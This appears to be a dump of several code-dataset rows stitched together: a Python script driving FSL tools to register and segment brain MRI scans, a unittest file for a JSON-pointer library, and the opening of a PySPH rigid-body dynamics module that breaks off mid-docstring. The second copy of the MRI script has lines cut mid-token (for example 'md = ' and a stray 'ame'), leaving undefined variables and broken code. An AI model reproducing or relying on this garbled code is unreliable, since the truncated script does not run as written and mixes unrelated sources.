mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'
# for aal
#atlas_template = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_template.nii'
#atlas_template = atlas_template.replace('C:', '/mnt/c')
#atlas_label = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_atlas.nii'
#atlas_label = atlas_label.replace('C:', '/mnt/c')
#for megaatlas:
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')
main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name
## Registration from MPRAGE to 1st CHARMED scan using inverse matrix of CHARMED to MPRAGE registration:
# From CHARMED to MPRAGE:
subj_mprage = subj_folder + mprage_file_name
subj_first_charmed = subj_folder + first_charmed_file_name
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] +'.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# Creation of inverse matrix:
inv_mat = out_registered_mat[:-4] + '_inv.mat'
cmd = 'bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# From MPRAGE to CHARMED using the inverse matrix:
out_registered = subj_folder + 'r' + mprage_file_name
cmd = 'bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(subj_mprage, subj_first_charmed, out_registered, inv_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
## BET for registered MPRAGE and mni template:
# BET for registered MPRAGE:
out_brain = out_registered[:-4]+'_brain'
cmd = 'bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain,'-f 0.40','-g 0.20')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# BET for mni template:
'''
# if not performed before, run:
atlas_brain = atlas_template[:-4] + '_brain'
cmd = 'bash -lc "bet {0} {1} {2} {3}"'.format(atlas_template[:-4], atlas_brain,'-f 0.45','-g -0.1')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
'''
## Registration from MNI to regisered MPRAGE:
# flirt for MNI to registered MPRAGE for primary guess:
options = r'-bins 256 -cost corratio -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder+ 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# fnirt for MNI based on flirt results:
#warp_name = subj_folder + 'atlas2subj.nii'
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
cmd = 'bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# apply fnirt warp on atlas template:
atlas_registered = os.path.join(subj_folder+ 'rr' + atlas_brain.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_brain, atlas_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# apply fnirt warp on atlas labels:
atlas_labels_registered = os.path.join(subj_folder+ 'r' + atlas_label.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
## FAST segmentation:
options = r'-t 1 -n 3 -H 0.1 -I 4 -l 10.0 -o'
cmd = 'bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
print('Finished file prep for ' +subj_name[:-1])
| 41.537736 | 156 | 0.712242 |
import os
subj_name = r'GaHi_subj01/'
mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')
main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name
ame
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] +'.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
inv_mat = out_registered_mat[:-4] + '_inv.mat'
cmd = 'bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
out_registered = subj_folder + 'r' + mprage_file_name
cmd = 'bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(subj_mprage, subj_first_charmed, out_registered, inv_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
md = 'bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain,'-f 0.40','-g 0.20')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
rchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder+ 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
cmd = 'bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_registered = os.path.join(subj_folder+ 'rr' + atlas_brain.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_brain, atlas_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_labels_registered = os.path.join(subj_folder+ 'r' + atlas_label.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
3 -H 0.1 -I 4 -l 10.0 -o'
cmd = 'bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
print('Finished file prep for ' +subj_name[:-1])
| true | true |
f72ee19e4a5aeceed8da6d03d596230a32b33ef5 | 7,332 | py | Python | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | 1 | 2021-05-28T13:39:14.000Z | 2021-05-28T13:39:14.000Z | jref/test/test_pointer.py | biochimia/python-jref | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
def setUp(self):
self.sentinel = object()
def check_pointer_is_sentinel(self, pointer, document):
self.check_pointer_equal(document, pointer, self.sentinel)
def check_pointer_equal(self, document, pointer, value):
self.assertEqual(Pointer.resolve_in(pointer, document), value)
# test that starting slash in non-empty pointer is optional
if (len(pointer) > 1
and pointer[0] == '/'):
self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)
def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
self.assertEqual(
Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer('key').resolve_in(document={'key': self.sentinel}),
self.sentinel)
def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
self.assertEqual(
Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer.resolve_in('key', document={'key': self.sentinel}),
self.sentinel)
def test_an_empty_pointer_resolves_to_the_document(self):
self.check_pointer_is_sentinel('', document=self.sentinel)
def test_empty_root_resolves_to_empty_key(self):
self.check_pointer_is_sentinel('/', document={'': self.sentinel})
def test_it_can_access_a_map_item_by_key(self):
doc = { 'key': self.sentinel }
self.check_pointer_is_sentinel('/key', doc)
def test_it_can_access_nested_map_items_by_key(self):
doc = { 'nested': { 'key': self.sentinel } }
self.check_pointer_is_sentinel('/nested/key', doc)
def test_it_can_access_array_element_by_index(self):
doc = [ 1, 2, self.sentinel, 4, 5 ]
self.check_pointer_is_sentinel('/2', doc)
def test_it_handles_complex_nesting(self):
doc1 = {
'a': [
1, 2, {
'c': [ 3, 4 ],
'd': 5,
},
],
'b': {
'f': [ 6, 7, 8 ],
},
}
self.check_pointer_equal(doc1, '/a/0', 1)
self.check_pointer_equal(doc1, '/a/1', 2)
self.check_pointer_equal(doc1, '/a/2/c/0', 3)
self.check_pointer_equal(doc1, '/a/2/c/1', 4)
self.check_pointer_equal(doc1, '/a/2/d', 5)
self.check_pointer_equal(doc1, '/b/f/0', 6)
self.check_pointer_equal(doc1, '/b/f/1', 7)
self.check_pointer_equal(doc1, '/b/f/2', 8)
doc2 = [
1, 2, {
'a': 3,
'b': {
'c': 4,
'd': [ 5 ],
},
},
]
self.check_pointer_equal(doc2, '/0', 1)
self.check_pointer_equal(doc2, '/1', 2)
self.check_pointer_equal(doc2, '/2/a', 3)
self.check_pointer_equal(doc2, '/2/b/c', 4)
self.check_pointer_equal(doc2, '/2/b/d/0', 5)
def test_it_supports_numerical_keys(self):
self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})
def test_it_supports_dash_as_a_map_key(self):
self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})
def test_it_raises_an_error_for_dash_as_an_array_index(self):
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('/-', document=[])
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('-', document=[])
def test_it_raises_an_error_for_array_index_out_of_range(self):
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('/5', document=[])
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('5', document=[])
def test_it_raises_an_error_for_non_numeric_array_index(self):
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('/key', document=[])
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('key', document=[])
def test_it_raises_an_error_if_key_not_in_document(self):
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('/key', document={})
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('key', document={})
def test_it_recognizes_tilde_escapes(self):
doc = {
'a~b': 1,
'ab~': 2,
'~ab': 3,
'a/b': 4,
'ab/': 5,
'/ab': 6,
'~/~': 7,
'/~/': 8,
'~0': 9,
'~1': 10,
}
self.check_pointer_equal(doc, '/a~0b', 1)
self.check_pointer_equal(doc, '/ab~0', 2)
self.check_pointer_equal(doc, '/~0ab', 3)
self.check_pointer_equal(doc, '/a~1b', 4)
self.check_pointer_equal(doc, '/ab~1', 5)
self.check_pointer_equal(doc, '/~1ab', 6)
self.check_pointer_equal(doc, '/~0~1~0', 7)
self.check_pointer_equal(doc, '/~1~0~1', 8)
self.check_pointer_equal(doc, '/~00', 9)
self.check_pointer_equal(doc, '/~01', 10)
def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('/~2', document={})
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('~2', document={})
def test_it_raises_an_error_on_unescaped_tilde(self):
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('/~', document={})
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('~', document={})
def test_it_raises_an_error_if_unable_to_resolve_token(self):
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('/key', document=object())
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('key', document=object())
def test_it_offers_support_for_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
value = LazyValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
def test_it_offers_support_for_recursive_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
class EvenLazierValue:
def __lazy_eval__(self):
return LazyValue()
value = EvenLazierValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
| 37.6 | 79 | 0.598882 | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
def setUp(self):
self.sentinel = object()
def check_pointer_is_sentinel(self, pointer, document):
self.check_pointer_equal(document, pointer, self.sentinel)
def check_pointer_equal(self, document, pointer, value):
self.assertEqual(Pointer.resolve_in(pointer, document), value)
if (len(pointer) > 1
and pointer[0] == '/'):
self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)
def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
self.assertEqual(
Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer('key').resolve_in(document={'key': self.sentinel}),
self.sentinel)
def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
self.assertEqual(
Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer.resolve_in('key', document={'key': self.sentinel}),
self.sentinel)
def test_an_empty_pointer_resolves_to_the_document(self):
self.check_pointer_is_sentinel('', document=self.sentinel)
def test_empty_root_resolves_to_empty_key(self):
self.check_pointer_is_sentinel('/', document={'': self.sentinel})
def test_it_can_access_a_map_item_by_key(self):
doc = { 'key': self.sentinel }
self.check_pointer_is_sentinel('/key', doc)
def test_it_can_access_nested_map_items_by_key(self):
doc = { 'nested': { 'key': self.sentinel } }
self.check_pointer_is_sentinel('/nested/key', doc)
def test_it_can_access_array_element_by_index(self):
doc = [ 1, 2, self.sentinel, 4, 5 ]
self.check_pointer_is_sentinel('/2', doc)
def test_it_handles_complex_nesting(self):
doc1 = {
'a': [
1, 2, {
'c': [ 3, 4 ],
'd': 5,
},
],
'b': {
'f': [ 6, 7, 8 ],
},
}
self.check_pointer_equal(doc1, '/a/0', 1)
self.check_pointer_equal(doc1, '/a/1', 2)
self.check_pointer_equal(doc1, '/a/2/c/0', 3)
self.check_pointer_equal(doc1, '/a/2/c/1', 4)
self.check_pointer_equal(doc1, '/a/2/d', 5)
self.check_pointer_equal(doc1, '/b/f/0', 6)
self.check_pointer_equal(doc1, '/b/f/1', 7)
self.check_pointer_equal(doc1, '/b/f/2', 8)
doc2 = [
1, 2, {
'a': 3,
'b': {
'c': 4,
'd': [ 5 ],
},
},
]
self.check_pointer_equal(doc2, '/0', 1)
self.check_pointer_equal(doc2, '/1', 2)
self.check_pointer_equal(doc2, '/2/a', 3)
self.check_pointer_equal(doc2, '/2/b/c', 4)
self.check_pointer_equal(doc2, '/2/b/d/0', 5)
def test_it_supports_numerical_keys(self):
self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})
def test_it_supports_dash_as_a_map_key(self):
self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})
def test_it_raises_an_error_for_dash_as_an_array_index(self):
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('/-', document=[])
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('-', document=[])
def test_it_raises_an_error_for_array_index_out_of_range(self):
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('/5', document=[])
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('5', document=[])
def test_it_raises_an_error_for_non_numeric_array_index(self):
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('/key', document=[])
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('key', document=[])
def test_it_raises_an_error_if_key_not_in_document(self):
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('/key', document={})
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('key', document={})
def test_it_recognizes_tilde_escapes(self):
doc = {
'a~b': 1,
'ab~': 2,
'~ab': 3,
'a/b': 4,
'ab/': 5,
'/ab': 6,
'~/~': 7,
'/~/': 8,
'~0': 9,
'~1': 10,
}
self.check_pointer_equal(doc, '/a~0b', 1)
self.check_pointer_equal(doc, '/ab~0', 2)
self.check_pointer_equal(doc, '/~0ab', 3)
self.check_pointer_equal(doc, '/a~1b', 4)
self.check_pointer_equal(doc, '/ab~1', 5)
self.check_pointer_equal(doc, '/~1ab', 6)
self.check_pointer_equal(doc, '/~0~1~0', 7)
self.check_pointer_equal(doc, '/~1~0~1', 8)
self.check_pointer_equal(doc, '/~00', 9)
self.check_pointer_equal(doc, '/~01', 10)
def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('/~2', document={})
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('~2', document={})
def test_it_raises_an_error_on_unescaped_tilde(self):
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('/~', document={})
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('~', document={})
def test_it_raises_an_error_if_unable_to_resolve_token(self):
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('/key', document=object())
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('key', document=object())
def test_it_offers_support_for_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
value = LazyValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
def test_it_offers_support_for_recursive_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
class EvenLazierValue:
def __lazy_eval__(self):
return LazyValue()
value = EvenLazierValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
| true | true |
f72ee435673a5217151a45861e9d332977bb5797 | 26,728 | py | Python | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:42:56.000Z | 2019-03-11T12:42:56.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2018-11-17T15:39:11.000Z | 2018-11-17T15:39:11.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Rigid body related equations.
"""
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
import sympy as S
x, y, z = vec[0], vec[1], vec[2]
return S.Matrix([[0, -z, y], [z, 0, -x], [-y, x, 0]])
def get_alpha_dot():
"""Use sympy to perform most of the math and use the resulting formulae
to calculate:
inv(I) (\tau - w x (I w))
"""
import sympy as S
ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
tx, ty, tz = S.symbols("tx, ty, tz")
wx, wy, wz = S.symbols('wx, wy, wz')
tau = S.Matrix([tx, ty, tz])
I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
w = S.Matrix([wx, wy, wz])
Iinv = I.inv()
Iinv.simplify()
# inv(I) (\tau - w x (Iw))
res = Iinv*(tau - w.cross(I*w))
res.simplify()
# Now do some awesome sympy magic.
syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
for lhs, rhs in syms:
print("%s = %s" % (lhs, rhs))
for i in range(3):
print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
"""Use sympy to perform some simple math.
R x F
C_m x F
w x r
"""
import sympy as S
x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
R = S.Matrix([x, y, z])
F = S.Matrix([fx, fy, fz])
print("Torque:", R.cross(F))
cx, cy, cz = S.symbols('cx, cy, cz')
d = S.Matrix([cx, cy, cz])
print("c_m x f = ", d.cross(F))
wx, wy, wz = S.symbols('wx, wy, wz')
rx, ry, rz = S.symbols('rx, ry, rz')
w = S.Matrix([wx, wy, wz])
r = S.Matrix([rx, ry, rz])
print("w x r = %s" % w.cross(r))
# This is defined to silence editor warnings for the use of declare.
def declare(*args): pass
class RigidBodyMoments(Equation):
def reduce(self, dst, t, dt):
# FIXME: this will be slow in opencl
nbody = declare('int')
i = declare('int')
base_mi = declare('int')
base = declare('int')
nbody = dst.num_body[0]
if dst.gpu:
dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')
d_mi = declare('object')
m = declare('object')
x = declare('object')
y = declare('object')
z = declare('object')
fx = declare('object')
fy = declare('object')
fz = declare('object')
d_mi = dst.mi
cond = declare('object')
for i in range(nbody):
cond = dst.body_id == i
base = i*16
m = dst.m[cond]
x = dst.x[cond]
y = dst.y[cond]
z = dst.z[cond]
# Find the total_mass, center of mass and second moments.
d_mi[base + 0] = numpy.sum(m)
d_mi[base + 1] = numpy.sum(m*x)
d_mi[base + 2] = numpy.sum(m*y)
d_mi[base + 3] = numpy.sum(m*z)
# Only do the lower triangle of values moments of inertia.
d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
d_mi[base + 7] = -numpy.sum(m*x*y)
d_mi[base + 8] = -numpy.sum(m*x*z)
d_mi[base + 9] = -numpy.sum(m*y*z)
# the total force and torque
fx = dst.fx[cond]
fy = dst.fy[cond]
fz = dst.fz[cond]
d_mi[base + 10] = numpy.sum(fx)
d_mi[base + 11] = numpy.sum(fy)
d_mi[base + 12] = numpy.sum(fz)
# Calculate the torque and reduce it.
d_mi[base + 13] = numpy.sum(y*fz - z*fy)
d_mi[base + 14] = numpy.sum(z*fx - x*fz)
d_mi[base + 15] = numpy.sum(x*fy - y*fx)
# Reduce the temporary mi values in parallel across processors.
d_mi[:] = parallel_reduce_array(dst.mi)
# Set the reduced values.
for i in range(nbody):
base_mi = i*16
base = i*3
m = d_mi[base_mi + 0]
dst.total_mass[i] = m
cx = d_mi[base_mi + 1]/m
cy = d_mi[base_mi + 2]/m
cz = d_mi[base_mi + 3]/m
dst.cm[base + 0] = cx
dst.cm[base + 1] = cy
dst.cm[base + 2] = cz
# The actual moment of inertia about center of mass from parallel
# axes theorem.
ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
ixy = d_mi[base_mi + 7] + cx*cy*m
ixz = d_mi[base_mi + 8] + cx*cz*m
iyz = d_mi[base_mi + 9] + cy*cz*m
d_mi[base_mi + 0] = ixx
d_mi[base_mi + 1] = ixy
d_mi[base_mi + 2] = ixz
d_mi[base_mi + 3] = ixy
d_mi[base_mi + 4] = iyy
d_mi[base_mi + 5] = iyz
d_mi[base_mi + 6] = ixz
d_mi[base_mi + 7] = iyz
d_mi[base_mi + 8] = izz
fx = d_mi[base_mi + 10]
fy = d_mi[base_mi + 11]
fz = d_mi[base_mi + 12]
dst.force[base + 0] = fx
dst.force[base + 1] = fy
dst.force[base + 2] = fz
# Acceleration of CM.
dst.ac[base + 0] = fx/m
dst.ac[base + 1] = fy/m
dst.ac[base + 2] = fz/m
# Find torque about the Center of Mass and not origin.
tx = d_mi[base_mi + 13]
ty = d_mi[base_mi + 14]
tz = d_mi[base_mi + 15]
tx -= cy*fz - cz*fy
ty -= -cx*fz + cz*fx
tz -= cx*fy - cy*fx
dst.torque[base + 0] = tx
dst.torque[base + 1] = ty
dst.torque[base + 2] = tz
wx = dst.omega[base + 0]
wy = dst.omega[base + 1]
wz = dst.omega[base + 2]
# Find omega_dot from: omega_dot = inv(I) (\tau - w x (Iw))
# This was done using the sympy code above.
tmp0 = iyz**2
tmp1 = ixy**2
tmp2 = ixz**2
tmp3 = ixx*iyy
tmp4 = ixy*ixz
tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
tmp6 = ixy*izz - ixz*iyz
tmp7 = ixz*wx + iyz*wy + izz*wz
tmp8 = ixx*wx + ixy*wy + ixz*wz
tmp9 = tmp7*wx - tmp8*wz + ty
tmp10 = ixy*iyz - ixz*iyy
tmp11 = ixy*wx + iyy*wy + iyz*wz
tmp12 = -tmp11*wx + tmp8*wy + tz
tmp13 = tmp11*wz - tmp7*wy + tx
tmp14 = ixx*iyz - tmp4
dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
if dst.gpu:
dst.gpu.push(
'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
'omega_dot'
)
class RigidBodyMotion(Equation):
def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
d_cm, d_vc, d_ac, d_omega, d_body_id):
base = declare('int')
base = d_body_id[d_idx]*3
wx = d_omega[base + 0]
wy = d_omega[base + 1]
wz = d_omega[base + 2]
rx = d_x[d_idx] - d_cm[base + 0]
ry = d_y[d_idx] - d_cm[base + 1]
rz = d_z[d_idx] - d_cm[base + 2]
d_u[d_idx] = d_vc[base + 0] + wy*rz - wz*ry
d_v[d_idx] = d_vc[base + 1] + wz*rx - wx*rz
d_w[d_idx] = d_vc[base + 2] + wx*ry - wy*rx
class BodyForce(Equation):
def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
self.gx = gx
self.gy = gy
self.gz = gz
super(BodyForce, self).__init__(dest, sources)
def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
d_fx[d_idx] = d_m[d_idx]*self.gx
d_fy[d_idx] = d_m[d_idx]*self.gy
d_fz[d_idx] = d_m[d_idx]*self.gz
class SummationDensityBoundary(Equation):
r"""Equation to find the density of the
fluid particle due to any boundary or a rigid body
:math:`\rho_a = \sum_b {\rho}_fluid V_b W_{ab}`
"""
def __init__(self, dest, sources, fluid_rho=1000.0):
self.fluid_rho = fluid_rho
super(SummationDensityBoundary, self).__init__(dest, sources)
def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
def initialize(self, d_idx, d_V):
d_V[d_idx] = 0.0
def loop(self, d_idx, d_V, WIJ):
d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(SummationDensityRigidBody, self).__init__(dest, sources)
def initialize(self, d_idx, d_rho):
d_rho[d_idx] = 0.0
def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
"""The viscous acceleration on the fluid/solid due to a boundary.
